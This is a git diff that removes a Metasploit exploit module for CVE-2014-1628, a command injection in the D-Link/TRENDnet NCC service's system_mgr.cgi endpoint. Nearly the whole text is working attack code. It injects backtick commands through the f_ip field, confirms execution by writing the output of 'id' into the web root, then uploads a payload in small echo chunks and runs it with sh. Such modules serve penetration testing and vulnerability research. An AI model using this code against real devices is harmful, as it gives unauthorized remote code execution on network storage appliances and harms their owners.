diff --git a/modules/exploits/linux/http/trendnet_cve-2014-1628.rb b/modules/exploits/linux/http/trendnet_cve-2014-1628.rb deleted file mode 100644 index e7d40248cb..0000000000 --- a/modules/exploits/linux/http/trendnet_cve-2014-1628.rb +++ /dev/null @@ -1,156 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::FileDropper - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'D-Link/TRENDnet NCC Service Command Injection', - 'Description' => %q{ - }, - 'Author' => - [ - 'Jon Hart ' - ], - 'License' => MSF_LICENSE, - 'References' => - [ - ['CVE', '2014-1628'] - ], - 'Platform' => ['unix'], - 'Arch' => ARCH_CMD, - 'Privileged' => false, - 'Payload' => - { - 'EncoderType' => Msf::Encoder::Type::CmdUnixEcho, - 'Compat' => - { - 'PayloadType' => 'cmd', - 'RequiredCmd' => 'generic perl' - } - }, - 'Targets' => - [ - [ 'Automatic', { } ] - ], -# 'Targets' => -# [ -# [ 'Linux mipsel Payload', -# { -# 'Arch' => ARCH_MIPSLE, -# 'Platform' => 'linux', -# 'EncoderType' => Msf::Encoder::Type::CmdUnixEcho -# } -# ], -# [ 'Linux mipsbe Payload', -# { -# 'Arch' => ARCH_MIPSBE, -# 'Platform' => 'linux', -# 'EncoderType' => Msf::Encoder::Type::CmdUnixEcho -# } -# ], -# ], - 'DisclosureDate' => 'Feb 26 2015', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/cgi-bin/system_mgr.cgi']), - ], self.class) - end - - MAX_CMD_SIZE = 13 - - def check - # run id and redirect output to a file we can access remotely. - canary_file = Rex::Text.rand_text_alpha(1) - exec_command("id>/var/www/#{canary_file}") - # snag a copy of the file - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => "/#{canary_file}" - }) - # clean up - exec_command("rm /var/www/#{canary_file}") - - if res - if res && res.code == 200 - if res.body =~ /uid=/ - print_good("Simple code execution possible as #{res.body}") - return Exploit::CheckCode::Vulnerable - end - end - end - - return Exploit::CheckCode::Unknown - end - - def exec_command(cmd, timeout = 20) - if cmd.length > MAX_CMD_SIZE - puts "cmd too long" - end - begin - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path), - 'encode_params' => false, - 'vars_post' => { - 'cmd' => 'cgi_log_server', - 'f_enable' => 1, - 'f_ip' => "`#{cmd}`" - } - }, timeout) - return res - rescue ::Rex::ConnectionError - fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") - end - end - - def exploit - print_status("#{peer} - Accessing the vulnerable URL...") - - unless check == Exploit::CheckCode::Vulnerable - fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL") - end - - print_status("#{peer} - Exploiting...") - payload_path = "/#{Rex::Text.rand_text_numeric(1)}" - - # create an echo wrapper that is smaller - vprint_status("Uploading echo wrapper") - echo_path = "e" -# exec_command("echo -n ech>#{echo_path}") -# exec_command("echo -n o>>#{echo_path}") -# exec_command("echo -n \\ >>#{echo_path}") -# exec_command("echo -n - >>#{echo_path}") -# exec_command("echo -n n >>#{echo_path}") -# exec_command("echo -n e >>#{echo_path}") -# exec_command("echo -n \\ >>#{echo_path}") -# exec_command("echo -n $ >>#{echo_path}") -# exec_command("echo -n @ >>#{echo_path}") -# exec_command("chmod 755 #{echo_path}") - # create empty payload file - exec_command(">#{payload_path}") - redirect = ">>#{payload_path}" - echo_cmd = "/#{echo_path} " - chunk_size = MAX_CMD_SIZE - (echo_cmd.length + redirect.length) - encoded_payload = Rex::Text.to_hex(payload.encoded, "\\\\x") - encoded_payload_offset = 0 - vprint_status("Uploading payload") - until (encoded_payload_offset >= encoded_payload.length) do - exec_command("#{echo_cmd}#{encoded_payload.slice(encoded_payload_offset, chunk_size)}#{redirect}") - encoded_payload_offset += chunk_size - end - - puts "Executing #{payload_path}" - exec_command("sh #{payload_path}") - #exec_command("rm #{payload_path}") - return - end -end